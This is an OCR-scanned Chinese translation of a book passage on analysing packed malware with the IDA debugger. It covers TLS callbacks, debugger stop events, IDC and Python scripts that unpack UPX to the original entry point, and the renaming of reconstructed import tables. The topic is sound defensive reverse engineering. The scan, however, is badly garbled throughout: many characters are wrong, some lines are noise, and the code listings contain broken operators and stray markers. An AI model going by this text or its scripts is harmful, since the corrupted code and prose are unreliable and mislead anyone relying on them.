修改 你 插入 的 断 点 指令 并 计算 代 段 区 域 的 校 验 和 。 

(5) 在 初次 分 析 程 序 时 ， 最 好 让 调试 带 处 理 该 程序 生成 的 所 有 措 毅 ， 以 便于 你 明智 地 决定 将 
哪些 异常 交 由 程序 人 处理， 哪些 寞 弟 应 由 调试 带 继 续 捕 获 。 

(6) 做 好 经 名 重新 开始 调试 的 准备 ， 因 为 一 步 出 错 ， 可 能 会 导致 整个 调试 过 程 失败 〈 例 如 ， 
如 采 你 允许 进程 检测 调试 硕 )。 请 详细 记录 你 确定 安全 的 地 址 ， 以 便 迅 速 找到 这 些 地 址 ， 重 新 开 
全 调试 过 程 。 

一 般 来 说 , 当 你 第 一 次 开始 分 析 一 个 特殊 的 模糊 程序 时 , 你 应 该 始终 保持 译 剧 ,多数 情况 下 ， 
你 的 主要 目标 是 获得 该 程序 的 去 檬 糊 版 本 。 然后, 你 的 下 一 个 目标 是 在 设置 断 点 之 前 ， 了 了解 你 到 
的 能 够 “ 走 多 远 ”， 从 而 加 快 去 模糊 过 程 ; 在 你 第 一 次 成 功 去 模糊 一 个 程序 后 ， 最 好 将 这 整个 过 




































































中 请 记 住 ,调试 带 插 入 的 软件 断 点 指令 将 导致 校 验 和 计算 ， 以 生成 一 个 非 预 期 的 结果 。 
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程 保存 下 来 ， 便 于 以 后 演练 。 
25.3.4 启动 进程 


无 论 你 是 否 已 花费 数 分 钟 或 数 小 时 使 用 IDA. 来 研究 某 个 恶意 可 执行 程序 ， 你 都 希望 在 调试 
估 中 初次 启动 该 程序 时 就 能 控制 它 。 控制 进 程 的 最 简单 方法 之 一 是 , 在 进程 的 入口 点 一 一 创建 进 
程 的 内 存 镜 像 后 执行 的 第 一 条 指令 一 一 设置 一 个 断 点 。 许 多 时 候 ， 入 口 点 带 有 符号 标记 start, 
但 有 时 则 没有 。 例 如 ，PE 文件 格式 允许 为 每 个 线程 的 数据 指派 用 于 执行 初始 化 和 解构 任务 的 
TLS6 回调 函数 "， 且 这 些 TLS6 回调 函数 会 在 控制 权 转 交 到 start 之 前 被 调用 。 

GI ën TLS 回调 也 数 的 特点 ， 并 利用 这 些 函 数 在 程序 的 主 入 口 点 代码 开始 运 
行 之 前 执行 一 些 代码 。 他 们 希望 任何 分 析 了 恶意 软件 的 人 将 不 会 注意 到 TLS 回 再 函数 ， 因 此 也 就 
无 法 了 解 所 分 析 程 序 的 真实 意图 。IDA 能 够 正确 解析 PE 文件 头 并 识别 PE 文件 中 的 任何 TLS 回 
调 也 数 ， 同 时 将 任何 此 类 函数 添加 到 Exports 窗口 内 的 二 进 制 文件 和 人口 点 列表 中 。 包 含 一 个 TLS 
回调 函数 的 可 执行 程序 的 Exports 窗口 如 图 25-3 所 示 。 














X 
:TlsCallback_0 00401450 
SC) start 00401000 





Line 1of 2 





图 25-3 Exports 窗口 显示 一 个 TLS 回调 函数 





对 于 TLS 回调 函数 而 言 ， 关 键 在 于 确定 它们 确实 存在 ， 然 后 在 每 个 TLS 回调 函数 的 起 始 位 
置 设置 新 点 ， 以 确保 你 能 够 及 时 获得 进程 的 控制 权 。 

许多 调试 硕 都 提供 了 选项 , 用 于 指定 调试 顺应 在 创建 进程 后 于 何 时 暂 俘 , IDA 也 不 例外 .IDA 
的 Debugger Setup 对 话 框 ( Debugger 》 Debugger Options ) 的 一 部 分 如 图 25-4 所 示 。 





À Debugger setup x| 


Events 
[ Stop on debugging start 


r Stop on process entry point 


[ Stopon thread start/exit 
[ Stop on library load/unload 
[ Stop on debugging message 





图 25-4 Jp E ERAT 


每 个 可 用 的 选项 都 为 你 提供 了 机 会 ,以 便于 在 发 生 特定 事件 时 自动 暂停 所 调试 的 进程 。 这 些 
事件 汇总 如 下 。 


(D TLS 回调 函数 的 更 多 信息 ， 参 见 PE 文件 格式 规范 : http://msdn.microsoft.com/en-us/windows/hardware/gg- 
463119.aspx。 
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口 Stop on debugging start( 在 调试 开始 时 停止 )。 此 选项 允许 你 在 创建 进程 后 尽早 暂停 调 
试 器 。 例如， 在 Windows 7 中 ， 此 选项 将 暂停 ntdll.dll 中 Rt1UserThreadStart 函数 起 始 位 
置 的 进程 。 调 试 需 将 在 任何 程序 代码 (包括 TLS 回调 函数 ) 执行 之 前 暂停 。 

口 Stop on process entry point〈 在 进程 入 口 点 停止 )。 一 旦 到 达 程 序 人 口 点 ， 即 暂停 调试 器 。 
通常 ,此 选项 的 作用 与 IDA 数据 库 中 的 start 符号 (或 类 似 符号 ) 的 作用 相同 。 所 有 TLS 
回调 孔 数 已 在 此 事件 发 生 之 前 执行 。 

口 Stop on thread start/exit (线程 启动 /退出 时 停止 )。 每 次 新 线程 启动 或 现 有 线程 终止 时 暂 
fam. Œ Windows 系统 中 ， 如 果 发 生 此 类 事件 ， 调 试 右 将 在 kernel32.dll 的 某 个 位 置 
暂停 。 

口 Stop on library load/unload〔〈 库 加 载 /卸载 时 停止 )。 每 次 加 载 新 库 或 印 载 现 有 库 时 暂停 调 
Waro TE Windows 系统 中 ， 如 采 发 生 此 类 事件 ， 调 试 大 将 在 kernel32.dll 的 某 个 位 置 暂停 。 

D Stop on debugging message“〈 在 输出 调试 消息 时 停止 )。 每 次 进程 使 用 调试 打印 设备 输 
出 消息 时 暂停 调试 需 。 在 Windows 系统 中 ， 此 选项 对 应 于 调用 0utputDebugString， 调 试 
gelift kernel32.dll 中 暂停 。 

为 了 防止 你 所 调试 的 进程 继续 执行 , 超出 你 预想 的 位 置 ,， 了解 进程 在 发 生 这 些 调试 需 事件 时 

可 能 的 暂停 位 置 非常 重要 。 确定 能 够 以 可 预见 的 方式 控制 进程 后 , 你 就 可 以 使 用 调试 器 执行 其 他 
任务 。 











25.3.2 ”人 简单 的 解密 和 解 庄 循 环 


这 里 说 的 简单 解 窒 和 解压 循环 是 指 没有 采用 骸 入 式 模 糊 拉 巧 的 循环 , 你 可 以 轻易 确定 其 中 所 
有 可 能 的 退出 点 。 如 果 你 遇 到 这 样 的 循环 ,分析 它们 的 最 简单 方法 是 在 所 有 可 能 的 退出 点 设置 断 
o 然后 让 循环 开始 执行 。 你 可 以 考虑 单 步 执行 这 些 循环 一 到 两 次 ， 以 初步 了 解 它 们 ,然后 再 相 
应 地 设置 断 点 。 如 果 在 一 个 循环 结束 后 立即 设置 一 个 汤 点 ,你 必须 确保 你 设置 的 断 点 所 在 地 址 处 
的 字 节 在 整个 循环 过 程 中 不 会 发 生变 化 ， 否则， 你 可 能 无 法 触发 软件 断 点 。 如 末 不 能 肯定 ， 可 以 
使 用 一 个 便 件 断 点 。 

如 采 你 的 目标 是 建立 一 个 完全 自动 化 的 去 模糊 过 程 , 那么 你 需要 开发 一 个 算法 , 用 于 确定 去 模 
糊 过 程 何 时 完成 。 如果 这 个 条 件 得 到 满足 , 你 的 目 动 化 解决 方案 将 能 够 使 进程 暂停 ,这 时 你 就 可 以 
拍摄 一 张 内 存 快照 。 对 于 简单 的 去 模糊 例 程 , 要 确定 去 模糊 阶段 是 否 已 经 结束 , 你 只 需要 观察 指令 
指针 的 一 个 明显 变化 ,或 者 条 个 指令 的 执行 。 例 如 ,模糊 Windows 可 执行 文件 UPX 解压 例 程 的 开 
始 和 结束 部 分 如 下 所 示 : 





























UPX1:00410370 start proc near 

@  UPX1:00410370 pusha 
UPX1:00410371 mov esi, offset off 40A000 
UPX1:00410376 lea edi, [esi-9000h] 
UPX1:0041037C push edi 


UPX1:004104EC pop eax 
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@ UPX1:004104ED popa ; opcode 0x53 
UPX1:004104EE lea eax, [esp-80h | 
UPX1:004104F2 
UPX1:004104F2 loc 4104F2: ; CODE XREF: start«186 Vj 
UPX1:004104F2 push 0 
UPX1:004104F4 cmp esp, eax 
UPX1:004104F6 jnz short loc 4104F2 
UPX1:004104F8 sub esp, OFFFFFF80h 
©  UPX1:004104FB jmp loc_40134C 





这 个 例 程 的 几 个 特点 可 用 于 自动 识别 它 是 否 完成 。 首 先 , 这 个 例 程 一 开始 就 在 程序 人 口 点 将 
所 有 寄存 絮 压 入 栈 中 ( @ )。 例 程 快 结 束 时 〈@ ) 弹出 所 有 寄存 促 ， 这 时 程序 已 经 解压 。 最 后 ， 
控制 权 已 转移 到 新 解压 的 程序 ( @ )。 因 此 ， 要 自动 完成 解压 ， 一 种 策略 是 单 步 跟踪 程序 ， 直 到 
当前 指令 为 popa。 由 于 单 步 跟 踪 相 当 绥 慢 ， 代 码 清单 25- 1 中 的 IDC 示例 采用 一 种 稍微 不 同 的 方 
法 来 扫描 popa 指令 ， 然 后 运行 程序 ， 直 到 popa 所 在 的 地 址 : 











代码 清单 25-1 简单 的 UPX DD ee fl 


#include «idc.idc» 
#define POPA 0x53 


static main() { 
auto addr, seg; 
addr = BeginEA();  //0btain the entry point address 
seg = SegName (addr); 
while (addr != BADADDR && SegName(addr) == seg) { 
if (Byte(addr) == POPA) { 
RunTo(addr); 
GetDebuggerEvent(WFNE SUSP, -1); 
Warning("Program is unpacked!"); 
e TakeMemorySnapshot (1); 
return; 


GK 


e addr = FindCode(addr, SEARCH NEXT | SEARCH DOWN); 


Í 
Warning("Failed to locate popa!"); 


代码 清单 25-1 "PES ve EEG Ja AT nc Bü TE. IDA 数据 库 中 局 动 ， 并 且 假 设 你 以 前 已 经 
使 用 Debugger » Select debugger 选择 了 一 个 调试 锅 。 这 上 段 脚本 详细 说 明了 如 何 局 动 调试 硕 并 控制 
新 建 的 进程 。 这 个 脚本 利用 了 UPX 的 一 些 非 常 特殊 的 特性 ， 因 此 并 不 特别 适合 作为 通用 的 去 模 
糊 脚 本 。 但 是 , 它 说 明了 一 些 我 们 稍 后 将 要 用 到 的 概念 。 这 个 脚本 有 两 个 依据 : 首先 ， 解 压 例 程 
位 于 一 个 程序 段 (通常 叫做 UPX1 ) 的 尾部 ; 其 次 ，UPX 并 未 利用 任何 取消 同步 技巧 来 阻止 正确 
的 反 汇 编 。 
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模糊 器 之 模糊 

E E E TELE ET BILE OLEI OD On DUDU D0EDH DCH Dr - EAE TET CID DIIS LE COE UI 
EL EE ELI E (E Ue TH E RETE LET E EI HI E IHE ELT THE ERE LETTERE E HD BI IER ELLE E DH "DH 
uguagguglglllilllliül UPXODIUDOUUOUOUOUBOSUDUDBULDLDLUL UPX 
可 加 
中 
uuu uPXHIDOULDN dg Uxor uPx1ij] UPXeL DHL TL ELO HL BEL O HEBEL CO E] E]. UPXT] 
EL ABE TEE o E o E EET ARE EH UB] [B OI [B 


这 个 脚本 因 这 两 个 依据 从 程序 的 入 口 点 开始 问 前 扫描 , 一 次 一 条 指令 ( @ ) P= 
令 位 于 同一 个 程序 段 内 ( @ ) 一 一 下 到 当前 指令 为 popa (6). 一 旦 到 达 popa 指令 ,调试 带 将 
SOS CO), DAT popa 指令 的 地 址 所 在 处 的 进程 ， 这 时 程序 已 经 被 解压 。 最 后 一 步 是 拍摄 一 
张 内 存 快照 4@ )， 将 经 过 去 模糊 处 理 的 程序 加 载 到 我 们 的 数据 库 中 ， 以 进行 深入 分 析 。 
一 个 更 加 通用 的 上 自动 化 解 包 解 决 方案 利用 了 一 个 事实 : 许多 去 模糊 例 程 通 闸 被 附加 到 一 个 二 
进 制 文件 的 结尾 部 分 , 一 旦 去 模糊 完成 , 它 将 跳 转 到 初始 的 入 口 点 ,这 个 入 口 点 通常 在 二 进 制 文 
件 的 开始 部 分 。 有 时 候 , 初始 的 入 口 点 可 能 位 于 一 个 截然 不 同 的 程序 段 ; 而 在 其 他 情况 下 ， 原 始 
的 入 口 点 可 能 就 在 去 模糊 代码 所 使 用 的 地 址 的 前 面 。 代 码 清单 25-2 中 的 Python 脚本 提供 了 一 个 
更 加 直接 的 方法 ， 可 以 运行 一 个 体 单 的 去 模糊 算法 ， 和 朋 到 它 跳 转 到 程序 的 初始 入 口 操 。 


代码 清单 25-2 ”继续 运行 ， 直 到 到 达 OEP 
start = BeginEA() 
@ RunTo(start) 
GetDebuggerEvent(WFNE SUSP, -1) 
O EnableTracing(TRACE STEP, 1) 
code = GetDebuggerEvent(WFNE ANY | WFNE CONT, -1) 
while code > 0: 
if GetEventEa() « start: break 
code - GetDebuggerEvent(WFNE ANY | WFNE CONT, -1) 
PauseProcess() 
GetDebuggerEvent(WFNE SUSP, -1) 
EnableTracing(TRACE STEP, O) 
MakeCode(GetEventEa()) 
TakeMemorySnapshot(1) 























oo © © 





与 代码 清单 25-1 中 的 脚本 类 似 ， 这 个 脚本 应 该 从 反 汇 编 可 而 不 是 调试 带 中 启动。 这 个 脚本 
详细 说 明 如 何 启动 调试 如 并 获得 必要 的 控制 权 , 以 运行 新 建 的 进程 ,这 个 特殊 的 脚本 有 两 个 假设 : 
入 口 点 之 前 的 所 有 代码 虱 被 模糊 处 理 ; 在 将 控制 权 转 交 给 入 口 点 前 面 的 地 址 之 前 , 没有 任何 恶意 
行为 发 生 。 这 个 脚本 首先 局 动 调试 带 并 在 程序 的 入 口 扣 处 暂 集 ( @ )。 然 后 ， 程 序 执行 单 步 跟踪 
Ce) 和 循环 ,以 测试 每 一 个 生成 的 事件 的 地 址 ( € )。 只 要 事件 地 址 到 达 程 序 入 口 点 地 址 的 前 面 ， 
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则 认为 去 模糊 已 经 守成， 进程 将 被 暂停 (@ )， 单 步 跟踪 也 被 荣 用 (@ )。 最 后 ， 这 个 脚本 还 确保 
当前 指令 指针 位 置 处 的 字 市 被 格式 化 成 代码 ( @ )。 
在 执行 这 个 脚本 的 过 程 中 ， 你 通 第 会 看 到 如 图 25-5 所 示 的 警告 。 


的 IDA has detected that EIP points inside a previously defined instruction. 
! This can perhaps indicate that: 














- an error occured during the analysis. 
- the coce modified itself during the execution. 
Would yau like ta directly create an instruction at LIP ? 


[ Don't display this message again 








K| 25-5 ”调试 需 指 令 指 针 警 告 








这 条 警告 指出 ， 指 令 指针 指 回 一 个 IDA 认为 是 数据 的 项 目 ， 或 者 指 回 一 个 之 前 已 经 反 汇 编 
的 指令 的 中 间 。 在 单 步 执行 利用 反 汇 编 “ 去 同步 ” 技 马 的 代码 时 ， 笛 笛 会 遇 到 这 样 的 警告 。 当 一 
个 程序 跳 转 到 一 个 之 前 为 数据 现在 为 代码 的 区 域 ( 对 一 个 程序 进行 去 模糊 处 理 后 往往 会 出 现 这 种 
情况 ) 时 ， 这 个 和 警告 也 经 笛 出 现 。 对 和 警告 中 的 问题 回答 “是 "，IDA 会 将 相关 子 市 重新 格式 化 成 
代码 ， 这 样 做 是 正确 的 ， 因 为 指令 指针 指出 这 是 下 一 个 将 要 提取 出 来 并 执行 的 项 目 。 

需要 注意 的 是 , 因为 使 用 了 单 步 跟 踩 , 代码 清单 25-2 中 的 脚本 的 执行 速度 要 比 代码 清单 25-1 
中 的 脚本 慢 得 多 。 但 是 ,执行 缓慢 也 市 来 了 一 些 好 人 处。 首先 ， 我们 可 以 指定 一 个 与 任何 地 址 都 无 
关 的 终止 条 件 ， 而 仪 仪 使 用 断 点 却 无 法 做 到 这 一 点 。 其 次 ， 在 这 个 脚本 中 ,任何 对 反 汇 编 此 去 同 
步 的 尝试 邦 将 失败 ,因为 指令 边界 完全 由 指令 指针 的 运行 时 值 决定 , 而 不 能 通过 裔 态 反 汇编 分 析 
决定 。 在 有 关 脚 本 化 调试 功能 "的 声明 中 ，Hex-Rays 提供 了 一 个 更 加 健壮 的 脚本 ， 该 脚本 能 够 执 
行 一 个 通用 解 包 器 的 任务 。 
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对 二 进 制 文件 去 模糊 后 , 接 下 来 可 以 开始 分 析 这 个 文件 。 里 然 我 们 从 未 打算 执行 经 过 去 模糊 
处 理 的 导入 表 ( 实际 上 ， 如 来 一 个 快照 被 下 接 加 载 到 IDA 数据 库 中 ， 我 们 根本 无 法 执行 这 个 程 
JF )， 但 是 要 了 解 程序 的 行为 ， 该 程序 的 导入 表 儿 乎 总 是 一 个 非常 重要 的 资源 。 

正常 情况 下 ,在 最 初创 建 数据 库 之 后 ,IDA 能 够 在 随后 的 文件 加 载 过 程 中 解析 程序 的 导入 表 。 
但 在 模糊 程序 中 ,IDA 在 加 载 阶段 看 到 的 唯一 导入 表 属 于 该 程序 的 去 模糊 组 件 。 此 导入 表 通 肖 仅 
包含 完成 去 模糊 过 程 所 需 的 最 小 数量 的 函数 。 最 复杂 的 模糊 冀 可 能 会 生成 空 导 入 表 , 这 时 去 模糊 
组 件 必须 包含 自行 加 载 库 和 解析 必要 的 函数 所 需 的 全 部 代码 。 

对 于 已 经 过 模糊 处 理 的 二 进 制 文 件 , 多 数 情 况 下 , 它 的 导入 表 也 已 经 过 模糊 人 处理， 并 在 去 柑 
糊 过 程 中 以 某 种 形式 进行 了 重建 。 一 般 情 况 下 , 重建 过 程 需 要 利用 新 近 经 过 去 模糊 处 理 的 数据 进 












































(D 参见 http://www.hex-rays.com/idapro/scriptable.htm。 
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行 它 自己 的 库 加 载 和 函数 地 址 解析 。 对 于 Windows 程序 而 言 ， 这 个 过 程 几乎 总 是 需要 调用 
LoadLibrary 函数 和 重复 调用 GetProcAddress， 以 解析 所 和 需 的 函数 地 址 。 

更 加 复杂 的 导入 表 重 建 例 程 可 能 会 利用 自 定 义 查 找 孔 数 来 代 蔡 GetProcAddress, 以 避免 触发 
GetProcAddress 目 己 设置 的 断 点 。 这 些 例 程 还 可 能 会 用 散 列 值 代 蔡 字符 串 ， 以 识别 被 请 求 的 函数 
的 地 址 。 少 数 情 况 下 ， 导 入 表 重 建 可 能 还 需要 避 开 LoadLibrary 函数 ， 这 时 重建 例 程 必须 上 自己 执 
行 该 函数 的 自 定 义 版 本 。 

最 终 ， 导 入 表 重 建 过 程 将 生成 一 个 吨 数 地 址 表 , 在 静态 分 析 上 下 文中 ,这 些 地 址 没有 任何 意 
义 。 如 果 拍 摄 一 个 进程 的 内 存 快照 ,我们 最 多 可 以 得 到 下 面 的 内 容 〈 部 分 显示 ): 























DATA XREF: starte«1v/o 
DATA XREF: sub 403BF3468/^r 
sub 405FOB+2B4 个 r ... 


UPX1:0040A000 dword 40A000 dd 7C812F1Dh 
UPX1:0040A004 dword 40A004 dd 7C91043Dh 
UPX1:0040A004 
UPX1:0040A008 dd 7C812ADEh 
UPX1:0040A00C dword 40A00C dd 7C9105D4h 
UPX1:0040A00C 
UPX1:0040A010 dd 7C80ABC1h 
UPX1:0040A014 dword 40A014 dd 7C901005h 
UPX1:0040A014 


we we 


wc 


DATA XREF: sub 40621F+5D 个 r 
sub 4070E8+F 个 r ... 


we 


we 


DATA XREF: sub 401564434/^r 
sub 4015A0427/^^r ... 


wc 


wc 








这 上段 代码 描述 大 量 4 FPE, 它们 的 地 址 紧密 相连 ， 并 且 被 程序 中 许多 不 同 的 位 置 引用 。 问 
题 在 于 ， 如 果 映 射 到 我 们 调试 的 进程 中 ， 这 些 值 (如 7C812F1Dh ) 表示 库 郴 数 的 地 址 。 在 程序 的 
代码 块 中 ， 我 们 可 以 看 到 类 似 于 下 面 的 函数 调用 : 





UPXO : 00403C5B € call ds:dword 404004 
UPX0:00403C61 test eax, eax 
UPX0:00403C63 jnz short loc 403C7B 
UPX0: 00403C65 ecall sub 40230F 

UPX0: 00403C6A mov esi, eax 

UPXO : 00403C6C Ocall ds:dword 40A058 





需要 注意 的 是 ， 有 两 个 函数 调 用 ( @ 和 @ ) OI (len A mue. MA A ERAI] 
H (Ceo 引用 的 是 一 个 正文 位 于 数据 库 中 的 函数 。 理 想 情 况 下 ,重建 后 的 导入 表 中 的 每 个 条 目 将 
以 它 包含 其 地 址 的 函数 命名 。 

我 们 最 好 在 为 经 过 去 模糊 处 理 的 进程 拍摄 内 存 快照 前 解决 上 述 问 题 。 如 下 所 示 ,， 如 采 从 调试 
从 中 查看 与 上 面相 同 的 内 存 范 围 , 我 们 将 看 到 一 个 截然 不 同 的 列表 。 因 为 调试 硕 已 经 访问 了 每 一 
个 被 引用 的 函数 所 在 的 内 存 区 域 ， 现 在 调试 需 能 够 将 地 址 (如 7C812F1Dh ) 显示 成 与 之 对 应 的 符 
号 名 称 ( 这 里 为 Kerne132 GetCommandLineA )。 























UPX1:0040A000 off 40A000 dd offset kernel32 GetCommandLineA ; DATA XREF:UPXO:loc 40128F 个 r 
UPX1:0040A000 ; Startin 

UPX1:0040A004 off 40A004 dd offset ntdll RtlFreeHeap DATA XREF: UPX0:004011EA^^r 
UPX1: 00404004 UPX0:0040120ATr ... 
UPX1:0040A008 off 40A008 dd offset kernel32 GetVersionExA DATA XREF: UPX0:004011D4^^r 
UPX1:0040A00C dd offset ntdll RtlAllocateHeap DATA XREF: UPX0:004011B3/^r 


woe we We we e 
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UPX1:0040A00C ; sub 405E98+D 个 r ... 
UPX1:0040A010 off 40A010 dd offset kernel32 GetProcessHeap ; DATA XREF: UPX0:004011AA^^r 
UPX1:0040A014 dd offset ntdll RtlEnterCriticalSection ; DATA XREF: sub 401564434/^^r 
UPX1:0040A014 ; Sub 4015404277 t ... 


注意 , 这 时 调试 器 采用 的 命名 方案 与 我 们 常见 的 命名 方案 略 有 不 同 。 V o ae EU Bm dE 
库 导出 的 函数 前 面 加 上 相关 库 的 名 称 和 一 个 下 划 线 。 例 如 ，kernel32.dll 导出 的 GetCommandLineA 
哨 数 的 名 称 为 kerne132_GetCommandLineA。 这 样 做 可 确保 在 两 个 库 导 出 同一 个 名 称 时 生成 唯一 的 
名 称 。 

对 于 上 面 的 导入 表 , 我 们 需要 解决 两 个 问题 。 其 一 , 为 了 使 函数 调用 更 具 可 读 性 ,我 们 需要 
根据 导入 表 中 的 每 个 条 目 引 用 的 郴 数 ， 为 这 些 条 目 命名 。 如 果 这 些 条 目 拥有 正确 的 名 称 ，IDA 将 
能 够 自动 显示 它 的 类 型 库 中 的 吨 数 签名 。 只 要 拥有 可 供 分 配 的 名 称 , 那么 命名 每 一 个 导入 表 条 目 
就 是 一 个 相对 容易 的 任务 。 这 诱 生 了 第 二 个 问题 : 要 获得 适当 的 名 称 。 获 得 名 称 的 一 种 方法 是 解 
析 调 试 硕 生成 的 名 称 ， 去 除 前 面 的 库 名 称 ， 并 将 剩 下 的 文本 作为 导入 表 条 目的 名 称 。 这 种 获取 名 
称 的 方法 存在 一 种 问题 , 即 有 些 时 候 ,， 库 名 称 和 函数 名 称 可 能 都 包含 有 下 划 线 字符 ， 这 使 得 我 们 
很 难 确定 一 个 较 长 的 名 称 字 符 串 中 也 数 名 称 的 准确 长 度 。 尺 管 如 此 ，IDA 自 带 的 renimp.idc 导入 
表 重 命名 脚本 (位 于 <IDADIR>/idc 目录 ) 仍然 采用 了 这 种 方法 。 

这 个 脚本 必须 在 调试 硕 处 于 活动 状态 (以便 访 问 加 载 的 库 名 称 ) 时 才能 正常 运行 并且 我 们 
必须 能 够 确定 去 模糊 二 进 制 文件 中 重 构 导入 表 的 位 置 。 确 定 已 重建 的 导入 表 的 位 置 的 一 种 策略 
是 ， 跟 踪 对 GetProcAddress 的 调用 并 记 下 结果 在 内 存 中 的 存储 位 置 。UPX 用 于 调用 
GetProcAddress 并 存储 结果 的 代码 如 代码 清单 25-3 所 示 。 


代码 清单 25-3 解析 并 存储 导入 的 函数 地 址 的 UPX 代码 



































UPX1:00408897 @call dword ptr [esi+8090h | 
UPX1:0040889D Or eax, eax 
UPX1:0040889F E short loc 4088A8 
UPX1:004088A1 mov [ebx], eax 
UPX1:004088A3 e add ebx, 4 


对 GetProcAddress 的 调用 发 生 在 @ 人 处 ， 其 结果 存储 在 内 存 中 的 @ 处 。 记 住 ，@ 处 的 ebx 寄存 
器 中 保存 的 值 将 可 获知 导入 表 的 位 置 。ebx 寄存 带 之 前 有 4 个 字 节 COD. HET AE FUORI PAZ 
解析 循环 作 好 准备 。 

确定 已 重建 的 导入 表 的 位 置 后 ，renimp.idc 要 求 我 们 使 用 单 击 并 拖 动 操作 突出 显示 从 表 开 头 
到 结尾 的 内 容 。renimp.idc 脚本 将 遍历 这 些 内 容 ， 获 得 所 引用 的 函数 的 名 称 ， 去 除 库 名 称 前 级 并 
相应 地 为 导入 表 条 目 命名 。 执 行 这 个 脚本 后 ， 前 面 的 导入 表 将 转换 成 如 下 所 示 的 导入 表 : 




















UPX1:0040A000 ; LPSTR stdcall GetCommandLineA() 

UPX1:0040A000 GetCommandLineA dd offset kernel32 GetCommandLineA 

UPX1:0040A000 ; DATA XREF: UPX0:loc 40128F/^^r 
UPX1:0040A000 ; start«1vo 

UPX1:0040A004 RtlFreeHeap dd offset ntdll RtlFreeHeap ; DATA XREF: UPX0:004011EA^^r 
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UPX1:0040A004 ; UPX0:0040120A 个 T ... 

UPX1:0040A008 ; BOOL  stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation) 
UPX1:0040A008 GetVersionExA dd offset kernel32 GetVersionExA ; DATA XREF: UPX0:004011D4 个 I 
UPX1:0040A00C RtlAllocateHeap dd offset ntdll RtlAllocateHeap ; DATA XREF: UPX0:004011B3/^r 
UPX1:0040A00C ; sub 405E984D^r ... 

UPX1:0040A010 ; HANDLE stdcall GetProcessHeap() 

UPX1:0040A010 GetProcessHeap dd offset kernel32 GetProcessHeap ; DATA XREF: UPX0:004011AA^r 
UPX1:0040A014 RtlEnterCriticalSection dd offset ntdll RtlEnterCriticalSection 

UPX1:0040A014 ; DATA XREF: sub 401564434^r 
UPX1:0040A014 ; sub 4015A0127^4 T ... 


如 上 所 示 ，renimp.idc 脚本 已 经 重 命名 了 每 一 个 导入 表 条 目 , 但 IDA 为 每 一 个 它 拥有 类 型 信 
息 的 因数 添加 了 男 数 原型 。 需 要 注意 的 是 ， 如 果 库 名 称 没 有 从 阴 数 名 称 中 去 除 ,， 则 IDA 将 无 法 
提供 孔 数 类 型 信息 。 男 外 ， 如 果 函 数 所 在 的 模块 的 名 称 中 包含 一 个 下 划 线 ，renimp.idc 脚本 可 能 
无 法 正确 地 提取 出 导入 函数 的 名 称 。ws2 32 网 络 库 就 是 一 个 典型 的 例子 ， 它 的 名 称 中 就 包含 一 
个 下 划 线 .renimp.idc 脚本 会 对 ws2_32 进行 特殊 处 理 , 但 对 于 任何 其 他 名 称 中 包含 下 划 线 的 模块 ， 
renimp.idc 脚本 无 法 从 它们 的 名 称 中 提取 出 正确 的 函数 名 称 。 

如 果 仅 有 一 条 指令 负责 存储 所 有 已 解析 的 王 数 地 址 (如 代码 清单 25-3 中 的 UPX 代码 )， 这 
时 可 以 采用 男 一 种 方法 来 重 命 名 导入 表 条 目 。 如 果 可 以 确定 此 类 指令 ( 如 代码 清单 25-3 中 加 处 
的 指令 )， 则 我 们 可 以 利用 IDA 使 用 IDC 语句 来 指定 断 点 条 件 这 样 一 个 事实 。 在 这 种 情况 下 ， 我 
们 可 以 在 地 址 004088A1 处 设置 一 个 条 件 断 点 ， 并 使 条 件 表达 式 调 用 我 们 定义 的 函数 。 下 面 我 们 
命名 了 createImportLabel 函数 并 将 其 定义 如 下 : 

















static createImportLlabel() { 
auto n = Name(EAX); 
auto i = strstr(n, " "9s 
while (i !- -1) { 
n = n[i-1:]; 
i = strstr(n, " "s 
; 
MakeUnkn(EBX, DOUNK EXPAND); 
MakeDword(EBX); 
if (MakeNameEx(EBX,n, SN NOWARN) == 0) ( 
MakeNameEx(EBX,n + " ",SN NOWARN); 
l 


return 0; 


j 


TER E WC éen) EAX 引用 的 名 称 。 前面 我 们 讲 到 , EAX 包含 调用 GetProcAddress 的 结 
因此 它 应 该 会 引用 某 个 DLL 中 的 国 数 。 然 后 ， 该 函数 执行 循环 ， 截 断 查 询 到 的 名 称 ， 仅 保留 原 
始 名 称 中 最 后 一 个 下 划 线 之 后 的 部 分 。 最 后 再 进行 一 系列 函数 调用 , 将 目标 位 置 (被 EBX 3 引用) 
正确 格式 化 为 一 个 4 字 节 数据 项 ， 并 将 一 个 名 称 应 用 于 该 位 置 。 通 过 返回 去， 该 吨 数 告诉 IDA 
不 要 实践 断 点 ， 因 此 执行 会 继续 进行 ， 而 不 会 暂停 。 
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在 第 24 章 中 ， 我 们 讨论 了 如 何在 DA 的 调试 带 中 指定 断 点 条 件 。 人 然而， 将 用 户 定义 的 函数 
设置 为 断 点 处 理 吉 并 不 像 设 置 和 编辑 断 点 然后 输入 createImportLabe1() 作 为 断 点 条 件 那样 简单 。 
尽管 此 时 我 们 确实 希望 输入 这 个 条 件 ， 但 问题 在 于 ,在 IDA 看 来 ，createImportLabel 是 一 个 未 
定义 的 函数 。 要 解决 这 个 问题 ， 我 们 可 以 创建 一 个 脚本 文件 ( 根据 定义 取 名 为 IDC )， 其 中 包含 
createImportLabel 隐 数 以 及 如 下 所 示 的 人 简单 的 main GEN. 








static main() { 

@AddBpt (ScreenEA()) ; 

OSetBptCnd(ScreenEA(), "createImportLabel()"); 
} 


将 光标 放 在 要 在 其 上 设置 断 点 的 指令 上 ， 然 后 运行 此 脚本 〈File » Script File )， 将 生成 一 个 
条 件 断 点 ， 每 次 触发 该 断 点 时 都 会 调用 createImportLabel, AddBpt 函数 ( 9) 在 指定 位 置 (本 
例 中 为 光标 位 置 ) 添加 一 个 断 点 ，SetBptCnd 函数 ( @ ) 将 一 个 条 件 添加 到 现 有 上 断 点 。 该 条 件 被 
指定 为 一 个 字符 串 ， 其 中 包含 每 次 触发 断 点 时 都 会 进行 求 值 的 IDC 语句 。 设 置 这 个 断 点 后 ， 一 
旦 完成 去 模糊 操作 ， 我 们 将 得 到 一 个 让 标签 的 导 和 人 表 ， 而 不 必 在 进程 的 内 存 空间 中 查找 导 人 表 。 

另 一 种 获取 名 称 信息 的 方法 是 搜索 内 存 , 查找 与 一 个 函数 地 址 有 关 的 文件 尖 , 然后 解析 这 些 
头 部 描述 的 导出 表 , 确定 被 引用 的 函数 的 名 称 。 基 本 上 ,这 是 在 根据 也 数 的 地 址 逆 癌 查询 该 限 数 
